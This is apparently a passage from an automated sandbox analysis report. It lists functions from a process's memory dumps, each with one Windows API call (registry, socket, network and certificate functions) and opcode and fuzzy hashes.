Opcode Fuzzy Hash: 097ba0d36844439edc896322db3dc467e530a8803bd2e9b705f2298ac483adbb
Instruction Fuzzy Hash: 013195B1509780AFE722CF25DC85F56FFE8EF45210F08849AE9848B292D365E908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05F92E2A, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E2C), ref: 05F92ECF

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 1b0381ca5ebf96dacc85f0ef986130770c48a841f14de7b9f81037a04cc4155c
Instruction ID: 1effbaeaad6d081f57682e4370b87224f54eaea02b1cd80d14a92a82d150b344
Opcode Fuzzy Hash: 1b0381ca5ebf96dacc85f0ef986130770c48a841f14de7b9f81037a04cc4155c
Instruction Fuzzy Hash: 8621BF72500304BFFB21DB64DC85FAAFBACEF44710F14885AFA449A281D6B4A9098B71

Uniqueness

Uniqueness Score: -1.00%

Function 05F937AC, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenCurrentUser.KERNELBASE(?,00000E2C), ref: 05F93845

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: CurrentOpenUser
String ID:
API String ID: 1571386571-0
Opcode ID: afc35fae46968806027c667b1c6b1f0c4167d3c4109e8af7e3c046249cf4ecbe
Instruction ID: 554b309a44e895c6f9487e6a7cd4dc323fd3c432963c23107a2c3723dffaf2d3
Opcode Fuzzy Hash: afc35fae46968806027c667b1c6b1f0c4167d3c4109e8af7e3c046249cf4ecbe
Instruction Fuzzy Hash: 4921B172409384AFEB128B24DC45F66BFA8EF46310F08849BED849F193D264A909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 05F91456, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

RasEnumConnectionsW.RASAPI32(?,00000E2C,?,?), ref: 05F91502

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: ConnectionsEnum
String ID:
API String ID: 3832085198-0
Opcode ID: bac1b85bf8e741cb62e961fbc9297b8cec00fc17251eda6df4d48d6a7687871e
Instruction ID: 30feda568d0900c61b226790fa102f36b2c5a4d414104bccffe9e0a92dcdde84
Opcode Fuzzy Hash: bac1b85bf8e741cb62e961fbc9297b8cec00fc17251eda6df4d48d6a7687871e
Instruction Fuzzy Hash: D231827640D3C05FD7138B259C55B61BFB4EF87710F0A80DBD8848F1A3D6256919C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 05F9503A, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 05F950CE

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: e68f635130cc307629345c364cf745978bd4c626db8508360805ca9ca5b29291
Instruction ID: 32cb3124aeccceaec52352c879cc384c90e73310c54d464efc06e67b984504dc
Opcode Fuzzy Hash: e68f635130cc307629345c364cf745978bd4c626db8508360805ca9ca5b29291
Instruction Fuzzy Hash: 1821B1B2505744AFEB228F24DC45F67FFB8EF45710F08849BED449B252D264A808CB71

Uniqueness

Uniqueness Score: -1.00%

Function 05F92B4C, Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F92BE0

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: shutdown
String ID:
API String ID: 2510479042-0
Opcode ID: 22b1757e8f96a1d1c2729161fd8b5fb30adcb39615d38948ca56de627c3819b9
Instruction ID: bc3a83ef0b4f9066ed1fbaf7401a7339875f5e6ccfd7ca1d9dbbfda6f5f49d3b
Opcode Fuzzy Hash: 22b1757e8f96a1d1c2729161fd8b5fb30adcb39615d38948ca56de627c3819b9
Instruction Fuzzy Hash: 682105B2405780AFFB128F54DC41FA6BFA8EF06320F1884ABE9449F193D2689805CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0168B55D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 0168B5EE

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 66602031802d96df3dc8bddad938cf78629a806c22a692ffc7a70471c6510a84
Instruction ID: 3e255fd5357799d7cfffc5f12f039d5ce96bc5fd61eb865abf67aba7c42f0886
Opcode Fuzzy Hash: 66602031802d96df3dc8bddad938cf78629a806c22a692ffc7a70471c6510a84
Instruction Fuzzy Hash: C8219171505380AFE7128F25DC44F66BFA8EF46310F0884ABEA45DB252D264E948CB71

Uniqueness

Uniqueness Score: -1.00%

Function 05F93084, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F9311B

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: a77f6c54ad0235a9a0360532c272e73b8c450a7507584073c65a24f4fd413c01
Instruction ID: 713b20c173d0fcd83099fc310c2466c1887cb394167c45093fcf03d30edfd0b3
Opcode Fuzzy Hash: a77f6c54ad0235a9a0360532c272e73b8c450a7507584073c65a24f4fd413c01
Instruction Fuzzy Hash: 40219471409384AFE712CB24CC45F56BFB8EF46314F0984DBEA849F263C264A909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0168B654, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000E2C,?,?), ref: 0168B6FA

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: d5dbb96b6358aa9dd8c4067ddea46893c3793635041a69333069239560d7e2d2
Instruction ID: 4a17cba917cbdd4886d6faf4b303f4e07348d756c5deac8f2183455cf0efe54e
Opcode Fuzzy Hash: d5dbb96b6358aa9dd8c4067ddea46893c3793635041a69333069239560d7e2d2
Instruction Fuzzy Hash: 8321A0715093C06FD312CB65CC55F66BFB4EF87610F0984DBE8848B2A3D624A909CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 05F92C30, Relevance: 1.6, APIs: 1, Instructions: 79timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F92CB9

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: a216019439ec241abe96ddfb786b050728b2fb8e6b58ac67bb698aca0abced8b
Instruction ID: 82f5d78cdf544f26d0eb95663346d2e738b41167fe21b49568624b6c5c44af0a
Opcode Fuzzy Hash: a216019439ec241abe96ddfb786b050728b2fb8e6b58ac67bb698aca0abced8b
Instruction Fuzzy Hash: 1E21C771505740AFEB228F25DC44F67FFB8EF46310F04849BED459B152D235A505CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05F939BF, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegNotifyChangeKeyValue.KERNEL32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F93A50

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: ChangeNotifyValue
String ID:
API String ID: 3933585183-0
Opcode ID: 889c2a4bfe359eea97dd9f30639174a49d26f3dca9e118aa3c67a0d543190873
Instruction ID: a2401218eff8d5d54343f46211012d49335638c21327aa109cf49976e79d9b43
Opcode Fuzzy Hash: 889c2a4bfe359eea97dd9f30639174a49d26f3dca9e118aa3c67a0d543190873
Instruction Fuzzy Hash: 61218171409784AFEB22CF65DC44F97FFB8EF46310F04889BEA859B152D225A508CB72

Uniqueness

Uniqueness Score: -1.00%

Function 05F938D2, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 05F93951

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: c874d646e5396f9fc7c5a7419f3998cf88fac31e4cb34c5597b064c69ff94a50
Instruction ID: 489ff96f33e912bb73e2f3bedbc5b9bf5b2d3a5a7bb9cebd3df64cb3c6987ba6
Opcode Fuzzy Hash: c874d646e5396f9fc7c5a7419f3998cf88fac31e4cb34c5597b064c69ff94a50
Instruction Fuzzy Hash: D6219D72900604AFEB20DF65DC44F6BBBADEF44720F14886AEA459B241D664A4088B71

Uniqueness

Uniqueness Score: -1.00%

Function 05F926BE, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 05F92749

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 8f1e2eb35046fbc46f921b997475283a1fcc88f4f90206dee6317757986ab2e2
Instruction ID: 99aff3e293d6f0c93cba9076049f6ae4fcef7ebdea640060b746ab467133c30c
Opcode Fuzzy Hash: 8f1e2eb35046fbc46f921b997475283a1fcc88f4f90206dee6317757986ab2e2
Instruction Fuzzy Hash: 7B219FB5509380AFE721CF25DC44F66FFA8EF45220F08849AE9849B252D375E908CB72

Uniqueness

Uniqueness Score: -1.00%

Function 05F91CAC, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F91D41

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 0c8aa590ebec2c91203932d649ac24afb2fe983ddfe6ecb9154a4f6126a3ef2d
Instruction ID: edcf374b69f4efa8e9017218ed06407f36f5f96cbe60f0ddc986cd29cad8e0f0
Opcode Fuzzy Hash: 0c8aa590ebec2c91203932d649ac24afb2fe983ddfe6ecb9154a4f6126a3ef2d
Instruction Fuzzy Hash: 3321F8B69087846FE712CB25DC40FA7BFA8EF47720F18809BED849B153D264A909C771

Uniqueness

Uniqueness Score: -1.00%

Function 05F94A97, Relevance: 1.6, APIs: 1, Instructions: 78encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F94B1E

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: 03766b918a5d67a04661d7909b9ff05f1f640764f2bfefd62e9054a1bfcce91b
Instruction ID: d6244c634d1b69f1587400e1619b0b6b3dc47d66715fa8157ef98ace55bb81d9
Opcode Fuzzy Hash: 03766b918a5d67a04661d7909b9ff05f1f640764f2bfefd62e9054a1bfcce91b
Instruction Fuzzy Hash: 5221C471508380AFEB12CF25DC44F66FFB8EF46320F08849BED849B252C265A845CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05F91BD6, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 05F91C55

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e757338fd5fc3d3feb58055637b4ab952b4a9a81be448d0ad089dce2198a70e2
Instruction ID: a0fc472a2f87ea1cd8a5f1244a322e07122575b9cc7ebac84b7b3ad879510a72
Opcode Fuzzy Hash: e757338fd5fc3d3feb58055637b4ab952b4a9a81be448d0ad089dce2198a70e2
Instruction Fuzzy Hash: 6421AC71A04604AFFB25DF25CD44FA6FBE8EF08310F14846AEA858B251D375E408CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 05F9252E, Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E2C), ref: 05F9259F

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 1892bae93e50a78192543fcd824fa5dc01c9ef1c9277103885cbc7bc1b6a342a
Instruction ID: c204f633724c9cd7144f8bda26d7adb51f19f4c2c2a9998936bf21a54530acad
Opcode Fuzzy Hash: 1892bae93e50a78192543fcd824fa5dc01c9ef1c9277103885cbc7bc1b6a342a
Instruction Fuzzy Hash: F9219F76500604AFFB20DF29DC45F6BBBADEF44710F14846AEE45DB241D664A9088B71

Uniqueness

Uniqueness Score: -1.00%

Function 05F904F0, Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000E2C), ref: 05F9058B

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a07a5e6412dfb29f3e2d756f5da09c1e2b03d20a803ef4797b0c9b5383b72660
Instruction ID: 4739e5613445c65e2d9eebe2da523c8f9bc6ff9196eaeef477cf3b24a06df2a7
Opcode Fuzzy Hash: a07a5e6412dfb29f3e2d756f5da09c1e2b03d20a803ef4797b0c9b5383b72660
Instruction Fuzzy Hash: 8821DA71505380AFE722CB14CC45F66FFB8EF06724F1880DAED845F192D268A949CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0168B2C4, Relevance: 1.6, APIs: 1, Instructions: 76registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E2C,?,?), ref: 0168B35E

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: fef257da30b8422fa68023d3935dbae166282466cb3930be2e2c9ed401b769b0
Instruction ID: 1ac8748c6c74ca06b3d4da4757ce4afe46ce950907f9495ade02a1447bef67b2
Opcode Fuzzy Hash: fef257da30b8422fa68023d3935dbae166282466cb3930be2e2c9ed401b769b0
Instruction Fuzzy Hash: 5421B6755093C06FD3138B259C51B62BFB4EF87A10F0981DBE9848B653D2256919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 0168A90A, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 0168A989

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: dfc7a78aba4e569d16cf35ef5d28a03fc183f520c5b04a971e65e130b59c6df4
Instruction ID: 5e7c2570bbae76aa1f8f33fa6dd07cdad5ba5bf5bbad95dad78937c9700e4979
Opcode Fuzzy Hash: dfc7a78aba4e569d16cf35ef5d28a03fc183f520c5b04a971e65e130b59c6df4
Instruction Fuzzy Hash: 6821AE76504704AFEB21AB59CC84F6BFBECEF08720F14895BEE459B241D660E409CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 05F9335E, Relevance: 1.6, APIs: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F933E2

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: d2384029d003808cc578ab05f78403231592be14a59426aa710bcb8a74e93527
Instruction ID: e2481446a30ce14665d93406a994a75521fea785a90e635175cff3211b6fc5f3
Opcode Fuzzy Hash: d2384029d003808cc578ab05f78403231592be14a59426aa710bcb8a74e93527
Instruction Fuzzy Hash: BF2150B2405784AFE722CB65DC44F97FFACEF46310F0884ABEA459B252D264A548CB71

Uniqueness

Uniqueness Score: -1.00%

Function 05F93AD2, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 05F93B46

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 095e536ad121ef0fc0a74c358f30212547ef68cda6a6377c2e3725e922830964
Instruction ID: 586be643159800e9f569a7c32f8e2b95a9725b99329355698c0953cccae09c36
Opcode Fuzzy Hash: 095e536ad121ef0fc0a74c358f30212547ef68cda6a6377c2e3725e922830964
Instruction Fuzzy Hash: 90216D72900704AFFB20DF65DC45F6BFBACEF44720F14886AEE459B281D674A8098A75

Uniqueness

Uniqueness Score: -1.00%

Function 05F9505A, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 05F950CE

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 0da64bfea4a41327cf8c5c8c2cc2dae11f5286e9bd24e8266e20443515f738e7
Instruction ID: 24ffaa41963934a17901aca53488fd87a98d946068fbb6694b8fe0d58c0402c0
Opcode Fuzzy Hash: 0da64bfea4a41327cf8c5c8c2cc2dae11f5286e9bd24e8266e20443515f738e7
Instruction Fuzzy Hash: BE21A172900704AFFB21DF14DC85F6BFBACEF45710F14895AED459B251D674A8088AB1

Uniqueness

Uniqueness Score: -1.00%

Function 05F9342C, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F934C1

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: d9d00da05851063f6bc05b16e844be6e126eac60bdd00cf013748cbf686d3a16
Instruction ID: a5e46288cd0715fa2bdf55435710b1352fdcf4c85fb9673fe9874941d708af2f
Opcode Fuzzy Hash: d9d00da05851063f6bc05b16e844be6e126eac60bdd00cf013748cbf686d3a16
Instruction Fuzzy Hash: 0E21F871409784AFEB228B15DC45F67FFB8EF06314F09849BED845B153C265A508CB71

Uniqueness

Uniqueness Score: -1.00%

Function 05F9319E, Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F93219

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: b90a86cd8067300b6e5bc0ff05381336ae39e881374a714ed1a4e3bafce01d68
Instruction ID: 1e933f8777b5316db2f1edbd146675988b169d55da514d46785b4f49a86b0b18
Opcode Fuzzy Hash: b90a86cd8067300b6e5bc0ff05381336ae39e881374a714ed1a4e3bafce01d68
Instruction Fuzzy Hash: 07218E71500604AFEB21CF55CC80F67FBE8EF48710F14896AEE4A8B251D675E909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 05F94B7E, Relevance: 1.6, APIs: 1, Instructions: 72encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F94C06

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: 34d693c008c6bce700b94f349465615db9473b3a0ba42dace05e199bd1f66257
Instruction ID: 22dd91ccfc2f1e3dfb0e8d47e5ac725b929dcffc2d85f91040cc733e7ef7c6b7
Opcode Fuzzy Hash: 34d693c008c6bce700b94f349465615db9473b3a0ba42dace05e199bd1f66257
Instruction Fuzzy Hash: 0C21B371408380AFEB128F24DC44F66FFB8EF46314F08849BED449B152C265A409CB71

Uniqueness

Uniqueness Score: -1.00%

Function 05F92A82, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 05F92AF5

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 9d83d70843725ca777fbc4ce926f570fabb200d4a8fe08f322fe55fdb112bf8b
Instruction ID: ae76bbebcfd6ff6059cb1f78f9099c6bffa04f59175c24fa38a158d2538103ce
Opcode Fuzzy Hash: 9d83d70843725ca777fbc4ce926f570fabb200d4a8fe08f322fe55fdb112bf8b
Instruction Fuzzy Hash: 7221AC75A00600AFFB25DF25DC84F66FBE8EF08610F14846AED498B241D674E809CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0168ACEF, Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0168AD6A

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 38bd45d219f31095955a6a32dc690e8f49be0e3327fed0affdaa94f6a3f92609
Instruction ID: b5a7fb50db81ca21fd0d4992990c6264e3ee45103130fd566b1819f0ad9b04af
Opcode Fuzzy Hash: 38bd45d219f31095955a6a32dc690e8f49be0e3327fed0affdaa94f6a3f92609
Instruction Fuzzy Hash: A4217FB65093805FE7128F65DC85B92BFE8EF46210F0985EBDD85CB263D264A808CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05F91E5E, Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F91EDD

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: cc9b0d6d2a22968d16f5b77d654444cf0e255f152b22981a9b9d0e5644c1ac26
Instruction ID: ec93d6db4a0ceda04e619033c5dbc81b8ea1e01f0f0bc92e1a179aa53d4aad45
Opcode Fuzzy Hash: cc9b0d6d2a22968d16f5b77d654444cf0e255f152b22981a9b9d0e5644c1ac26
Instruction Fuzzy Hash: 70219272405344AFEB228F55DC44F57FFB8EF46314F0884ABEA449B152C264A408CB71

Uniqueness

Uniqueness Score: -1.00%

Function 05F95166, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F951D8

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 0a3ff0f3198269fa616c0974d0fcf6e12495085e69dca54636cee0870d1ea5b9
Instruction ID: 1caf7930df9a965ee4e12f53c499baf409ff20a4b986a6698a2cef1e9cabdd6c
Opcode Fuzzy Hash: 0a3ff0f3198269fa616c0974d0fcf6e12495085e69dca54636cee0870d1ea5b9
Instruction Fuzzy Hash: 6F216A72500600AFEB22CF55DC80FA7BBACEF04710F14886AEE499B251D664E449CA71

Uniqueness

Uniqueness Score: -1.00%

Function 05F934FE, Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05F93582

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: 8b891b93438bc9f2efb772998943e2182895cd91cc2ac54e5e00c6499794af1d
Instruction ID: 037aa5462487d9f95166842d4db2c78b7c58680006276fee916b42fed7d07170
Opcode Fuzzy Hash: 8b891b93438bc9f2efb772998943e2182895cd91cc2ac54e5e00c6499794af1d
Instruction Fuzzy Hash: B6219075409780AFDB22CF65D844A92FFF4EF0A210F0984DAE9858B163D275A808DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0168AA12, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 0168AA8C

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 0482491e2ab35541dacaa37643f26c2652f08126812bdf0e7f6a21c7d859103b
Instruction ID: 340fc5f16f07fe6344d8194933c2e4e458858545fbf1b374c278e178dabbfaa4
Opcode Fuzzy Hash: 0482491e2ab35541dacaa37643f26c2652f08126812bdf0e7f6a21c7d859103b
Instruction Fuzzy Hash: BF215871600604AEE721DE59CD84F67FBE8EF04710F08856BEE459B751D760E909CA71

Uniqueness

Uniqueness Score: -1.00%

Function 05F91FD3, Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F92054

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: 979b2326ebe6f5d9898da48d703d7804046f779807bbcedb6b3fb93d90593279
Instruction ID: c82fca06e0d273d916cdf0a3765919cff0335cbe3ceb0b6dd70ab1d6afab9076
Opcode Fuzzy Hash: 979b2326ebe6f5d9898da48d703d7804046f779807bbcedb6b3fb93d90593279
Instruction Fuzzy Hash: 0821E471408784AFEB128B15CC44FA6FFB8EF06324F0884DBED849F253C265A449CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05F926DE, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 05F92749

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 5dd33c37bf47d0853422b80350005e5882db853029ba9fdc411059137ef30d8c
Instruction ID: b9cbc0db8c5023d3b61d2c1cc6adcd5d023a7b3a4f10f6c419e1124dc5054503
Opcode Fuzzy Hash: 5dd33c37bf47d0853422b80350005e5882db853029ba9fdc411059137ef30d8c
Instruction Fuzzy Hash: 2C219F79900600AFFB24DF25DC85B66FBA8EF44220F14846AEE499B241D675A804CB72

Uniqueness

Uniqueness Score: -1.00%

Function 05F9229B, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,?,?,?,?), ref: 05F92318

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: d8382ba8857aeb7f5dcc50e6f284a85c787a0174491c59b13080928684ff66b9
Instruction ID: f2e5fc27118c2a3cc35b53d2995a490a16ba7dfaf9cde748d3494548ac6c0234
Opcode Fuzzy Hash: d8382ba8857aeb7f5dcc50e6f284a85c787a0174491c59b13080928684ff66b9
Instruction Fuzzy Hash: 88219A324097C0AFDB128F65DC54AA2BFB4EF4B320F1985DAD9888F163C2359849DB61

Uniqueness

Uniqueness Score: -1.00%

